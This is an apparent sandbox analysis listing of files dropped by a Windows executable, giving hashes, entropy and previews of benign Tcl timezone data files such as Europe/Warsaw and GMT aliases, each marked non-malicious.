                                                                                                                                                                                                                              SSDEEP:96:FAhEpkwCXkSV3A/PplKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:FfWHUSKivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:1AB5FCEACC4E09074BA9F72F0B7747D5
                                                                                                                                                                                                                              SHA1:E0134E61EC0ADC60BF6DB4544EA7B7FFA4EC7857
                                                                                                                                                                                                                              SHA-256:B762DB4A068DC79FA57691E070D7026086E5A6D2FC273D5C1872E7C8E3711533
                                                                                                                                                                                                                              SHA-512:07565071D05CF972DD64F6060599EB68A00BF264172873BA310168AD07CE0CFCF90D0019B775433EC910DA748B89F0C614E7FD4E821993DA53C7E33F194C6A97
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vilnius) {.. {-9223372036854775808 6076 0 LMT}.. {-2840146876 5040 0 WMT}.. {-1672536240 5736 0 KMT}.. {-1585100136 3600 0 CET}.. {-1561251600 7200 0 EET}.. {-1553565600 3600 0 CET}.. {-928198800 10800 0 MSK}.. {-900126000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-802141200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 7200 0 EEMMTT}.. {606873600 10800 1 EEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2123
                                                                                                                                                                                                                              Entropy (8bit):3.667144931158014
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:menvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDqR:mevCAs6kC6aZF1cSNcjXgV/ApDFjDqR
                                                                                                                                                                                                                              MD5:53E5BA5747B3255BB049F6FF651CEE25
                                                                                                                                                                                                                              SHA1:A69E2BFDB89AC8756E1CD2EAA9109ACD924A0850
                                                                                                                                                                                                                              SHA-256:22968D40DAC2B669E6D2BC43ED6B16C8A9CA3E1F9DACBF8B246299C3C24CC397
                                                                                                                                                                                                                              SHA-512:3269D20DF9C9DDFF8252F33ED563B118771FC71049542DA7C6678E0B5B75FFEA00845FA6F3BC26EDABB4BB7CE449B0B7E00B72473D8D95F126AB3893A9A969B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Volgograd) {.. {-9223372036854775808 10660 0 LMT}.. {-1577761060 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-256881600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8662
                                                                                                                                                                                                                              Entropy (8bit):3.8187545871488995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ELn9M9Nivtctwwoy4qelPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCso:E6Nivtctgq1sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:992C1D268E336AF1FB8200966C111644
                                                                                                                                                                                                                              SHA1:C893B82224C8EF282DB2E16A5BBCC3A21C49B6FE
                                                                                                                                                                                                                              SHA-256:F9DC10EC2AE2CC810A6C08837059B34BE651900BA4E1CEDB93C209972CCFB5A2
                                                                                                                                                                                                                              SHA-512:EC4E0D8684D57FA66144F11D8E8C80E5272D4A7304300FEBE20E236476C1B8B33BBC5E479BF96D9ED12900FE6D41DD1DC0D11CBE02B89E0C4C7A153B4BFBCB1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Warsaw) {.. {-9223372036854775808 5040 0 LMT}.. {-2840145840 5040 0 WMT}.. {-1717032240 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618696800 7200 0 EET}.. {-1600473600 10800 1 EEST}.. {-1587168000 7200 0 EET}.. {-931734000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796870800 7200 0 CEST}.. {-796608000 3600 0 CET}.. {-778726800 7200 1 CEST}.. {-762660000 3600 0 CET}.. {-748486800 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-715215600 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-397094400 7200 1 CEST}.. {-386812800 3600 0 CET}.. {-371088000 72
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.899266605519742
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQa5rXv1/h8Q0:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNB
                                                                                                                                                                                                                              MD5:B07D9D3A5B0D11A578F77995A5FBE12B
                                                                                                                                                                                                                              SHA1:1C4E186F2D53C0A1E6A82A6D33B172E403A41D6D
                                                                                                                                                                                                                              SHA-256:A49B3894EB84F003EB357647D6A40CEAF6213523196CC1EC24EEFD7D9D6D3C3E
                                                                                                                                                                                                                              SHA-512:43520AE325980B236C47C866620D1DA200AC0CD794E8EB642D2936D4B0ECEFE2DA0A93C9559D08581B3CCE2BC75251A4D5B967D376B16EB0C042B0ADCE1DCD01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Zagreb) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.999265802825238
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa58KXkcAEfh8Qaocqn:SlSWB9vsM3ym5HAIgoiAN/yjzVbh8C
                                                                                                                                                                                                                              MD5:5B150E25521FE5DD8B83DD9B1B8F3A7A
                                                                                                                                                                                                                              SHA1:0BB6F73F2C4B2464F3B1E62138843389AF1A07BC
                                                                                                                                                                                                                              SHA-256:EF928AC09B9A366FD015F488B6A19FEFD72DE1BAF34E5CADFB8334946BCF19FE
                                                                                                                                                                                                                              SHA-512:4A85A4E929EC6FE66AE60899FA55A75156D075CB2FE41C19337A128F5FA7363B9208AC2DC1BF4E44B76D5F115143D73F6D923E255EA78538D1BE4E45DEBA2049
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Zaporozhye) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7305
                                                                                                                                                                                                                              Entropy (8bit):3.8199799674700277
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:94hH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:9Y41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:EBD66FAEA63E1B90122CC1EB21634ECE
                                                                                                                                                                                                                              SHA1:C6487BB8AB2A6A72B2170B220F383ADB6B9AC91C
                                                                                                                                                                                                                              SHA-256:95AFA61E439CA38551306D8FDB11C2788D935C42768D0407C9E4337F105A3E93
                                                                                                                                                                                                                              SHA-512:25A8D0ED9BBE6BF23A1A76CC6D5378CF4D50544AA22DA97DDCD0673D7A5CCFEFFD81B660A1AEFB254B8BBEA55F6EF734BBBD3F0CB903E0721BE107667CA1E328
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Zurich) {.. {-9223372036854775808 2048 0 LMT}.. {-3675198848 1786 0 BMT}.. {-2385246586 3600 0 CET}.. {-904435200 7200 1 CEST}.. {-891129600 3600 0 CET}.. {-872985600 7200 1 CEST}.. {-859680000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.8978035005721265
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/wox6QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/wRj
                                                                                                                                                                                                                              MD5:68667037110E713DB3F51922DDE929FE
                                                                                                                                                                                                                              SHA1:2EB02BE3FD35F105B59847892A78F1AA21754541
                                                                                                                                                                                                                              SHA-256:E20D829C605A7C5B2A96B83C3480DF28C964A13381A8BD2C72C2A37295131FA7
                                                                                                                                                                                                                              SHA-512:3A8CC2EC9E3053283F996CA2C4B422061D47F1D16CA07985CBA2C838DF322C23CC9DD28033646F22EAE0E401781480B9D3AF82A539444166A4DD9B7BCCAE45FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):175
                                                                                                                                                                                                                              Entropy (8bit):4.90874180513438
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/w4b/h8QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/w4E
                                                                                                                                                                                                                              MD5:625520BAAB774520AC54BFB9EDCF9FCA
                                                                                                                                                                                                                              SHA1:C72F0FD45F448901C6B2E24243175729591B9A54
                                                                                                                                                                                                                              SHA-256:C9334480D0A970254B6BA6FF22E958DC8DD8BF06288229461A551C7C094C3F1D
                                                                                                                                                                                                                              SHA-512:1B672218FF9C86168E065A98C3B5F67DAB710D1C2A319E9D6599B397C4B4C00D3721B76C735C8AB04BCB618C1832B07F6CCDAF4266CC0D12A461A3A862D1AEB2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:GB-Eire) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                              Entropy (8bit):4.867609984313873
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wZ8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wZ8RQy
                                                                                                                                                                                                                              MD5:A01FE6FC260711F0E11C85DC3DE3550A
                                                                                                                                                                                                                              SHA1:988311B71498591425C63669DC3F802F270B2C44
                                                                                                                                                                                                                              SHA-256:747C15CDC239855D5380B7A7F47112F2A26C61B0BF300EEB9711E6521550D189
                                                                                                                                                                                                                              SHA-512:BE4678DCBAE5DBC72865665413206C1909F28BA54F4943257870EFFBA6525457866DED7A985E89F2689C810B314DE4AA2FA3A0A1826A664727F5F7113AA56595
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                              Entropy (8bit):4.917182390229381
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/we7/8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wI8RQy
                                                                                                                                                                                                                              MD5:3327B1BF3118AC6AFC02C31DF5B67CD9
                                                                                                                                                                                                                              SHA1:3932577E66801AD31519B0BB56CCE7B9E36221A9
                                                                                                                                                                                                                              SHA-256:BE48462CCFBB3AEE19597F082A17C2C5D2FD8BB1C9122245EFAB0A51F8F413B0
                                                                                                                                                                                                                              SHA-512:53866FD513B039E8203E51FF3434D5736D3A4C4E0A46874D1C99A17115181AF749F0D079C2E14C5B0538D3DFA52B1645C977CD6599DA3EDA57CC7F84EEAB2D06
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT+0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):155
                                                                                                                                                                                                                              Entropy (8bit):4.904279164422928
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/w4Hp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/w4J8RQy
                                                                                                                                                                                                                              MD5:0CFFC5655F031D954BD623CC4C74DC9C
                                                                                                                                                                                                                              SHA1:CE5E7AD67252F52D7E70719725FF5BE393DD6EF0
                                                                                                                                                                                                                              SHA-256:944C86F516141DDC3AEC1AE4A963E9769879C48ED12DADDF4ED63A01313ACD00
                                                                                                                                                                                                                              SHA-512:C7352D1394E8B8AC90CD19EE753D5277259BE5512ADDCAED2A2DEF144762CF20BE7A9FA09AAA1829EE401DD195C2AED8C967A7FF46739236E042AF4298EC84A2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):154
                                                                                                                                                                                                                              Entropy (8bit):4.892526720357546
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wPHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/wvp8RQy
                                                                                                                                                                                                                              MD5:565B41A5DB28F9FE7D220E9BA39062A4
                                                                                                                                                                                                                              SHA1:5183689210F07C8A71F880DCE8E5C2CB62CEB17D
                                                                                                                                                                                                                              SHA-256:54850A5F488205DB01FBB46E2DA9FFF951C4571029EA64D35932DDEA5346DAAF
                                                                                                                                                                                                                              SHA-512:BD6E5141F06B03D62DCF725E9E48D6AA8ECD6E8E47A4015B25DC3F672392065FFFD80D688C6695324DC105EA528025CF447FA77E6D17E15D438E61DC51879CB7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:GMT0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.917976058206477
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/wE+FB5yRDMovn:SlSWB9vsM3yFXHAIgnvVHN/wE6BURQy
                                                                                                                                                                                                                              MD5:443FA76F107ED438F9571A044B848C6A
                                                                                                                                                                                                                              SHA1:1CF508429DFC40643B1FAB336A249A3A287D8C7C
                                                                                                                                                                                                                              SHA-256:9E7A8DAA26CE36E8F7D7F13460915C063EE98E2A4DB276AD9D15CA5C7C06815F
                                                                                                                                                                                                                              SHA-512:6C0C5FF513A742FBDA349AC3A2581D456701B5348A54ECF38E496DAA1EFC74D937982B6F69F1761CC2FC4B88D9A971EFA2B16096E71EAF002EC5CE4130B533DE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Greenwich) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):111
                                                                                                                                                                                                                              Entropy (8bit):4.90682088010982
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x//LhdNMXGm2OH1V90v:SlSWB9eg/jJDm2OH1VGv
                                                                                                                                                                                                                              MD5:79C82A5F8B034E71D0582371E3218DBB
                                                                                                                                                                                                                              SHA1:1476CE8EA223095094B6D25D171E6319C96669F4
                                                                                                                                                                                                                              SHA-256:8D710699AF319E0DDB83E9F3A32D07AE8082EA2F7EABBD345EFFFFB0F563062E
                                                                                                                                                                                                                              SHA-512:ADEE55581D1A158929F09A63B03883ABE9193337DDF225C61AFDBB8A2C7D0BD248ADC4714E0EEFD334826C54C1AFFC8B1E6C2B0D6EF830C3CCA50CC79834F473
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:HST) {.. {-9223372036854775808 -36000 0 HST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.913328649996328
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8Li0vXHAIgN2qfvRL//XF1p4WFKQyvn:SlSWB9vsM3yW2HAIgAOvN///p4wKlvn
                                                                                                                                                                                                                              MD5:6A307B229C302B1BAE783C8143809269
                                                                                                                                                                                                                              SHA1:EA169AF81AD12380A69FB6B7A12479BA8B82878B
                                                                                                                                                                                                                              SHA-256:359C9C02A9FA3DE10BA48FA0AB47D8D7AFF3B47F950CFAF5EB68F842EA52AB21
                                                                                                                                                                                                                              SHA-512:505445FD0B3E140384EDC27993923BBF9ACD23A244B0F14D58804BFAA946D0BC4C0D301FBCCB492BAFDA42C8A92F4163FB96F4D75DD7374858D1C66183BEC24B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Hong_Kong)]} {.. LoadTimeZoneFile Asia/Hong_Kong..}..set TZData(:Hongkong) $TZData(:Asia/Hong_Kong)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.853280551555672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/+GAKyx/2DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/+XZx+D4
                                                                                                                                                                                                                              MD5:710D3A32EA8EAD11B45D4911DA8F2676
                                                                                                                                                                                                                              SHA1:146D2A6D48940E58567EFA3BCA134D195E4649E6
                                                                                                                                                                                                                              SHA-256:8A531293F672D8FE38996989FC4EEB22B5EFE6E046E2F58E94D01DA9CE56EF68
                                                                                                                                                                                                                              SHA-512:70432973549C1A83036E0658AEE81C883F19D0D631E35F4C70F2EC69C9384E99340004618EF8B414D8EA9090C6C3120CF46A5D9ABDE4113917995B2844337988
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Iceland) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.807410166086502
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/+L6EL/liEi2eDcVVMB:SlSWB9vsM3y7VTHAIgNTxcAN/+LzM2eV
                                                                                                                                                                                                                              MD5:0F20CBF1F7600D05F85D4D90FDAB2465
                                                                                                                                                                                                                              SHA1:2F3C9479C4F4CD7999B19C07359B89A5FB1B9839
                                                                                                                                                                                                                              SHA-256:1B1177CE4D59D7CBCAE9B0421EB00AD341ECB299BD15773D4ED077F0F2CE7B38
                                                                                                                                                                                                                              SHA-512:657341FC2CCD6A4F7B405ABC8E24C651F6FFEFD68EBD6E2086ADF44834DCBF21D1B9D414436E42C8DCE46FFB88116B98C1D073782E214B3996D49EC00DFF4383
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Indian/Antananarivo) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.853088038233057
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/+L6EL9WJx3vFNMXGm2OHi/FvoHscfJ7XH0VQVFV6VVFSTVV:SlSWB9eg/+LxWJxPDm2OHqFvoH9+VQV3
                                                                                                                                                                                                                              MD5:06143C3DFD86B3FE4F2A3060C0E05BB6
                                                                                                                                                                                                                              SHA1:88E0E30CEE4AB8117860A35AD03B16AF48988789
                                                                                                                                                                                                                              SHA-256:11044AD7CB0848CC734D2A67128AA6AC07CB89268399AA0A71A99024DE4B8879
                                                                                                                                                                                                                              SHA-512:79195D3D0D475BEA982F40683D4BA14AC33B3FA91311F513DCED955C9297C2B0F12D94CCA930FAE0FB7F95DB34CD4E74B5AF0233E792122646592B7EFF0F3163
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Indian/Chagos) {.. {-9223372036854775808 17380 0 LMT}.. {-1988167780 18000 0 +05}.. {820436400 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.910217468889087
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/+L6EL9FBIEWoxp4Wx:SlSWB9vsM3y1LePHAIgKELtAN/+LxpWg
                                                                                                                                                                                                                              MD5:39CB9E58C0086B80FB12AC10A6D371E2
                                                                                                                                                                                                                              SHA1:2A9A5CCA411779615A62D9E82023B6A066CB3CF3
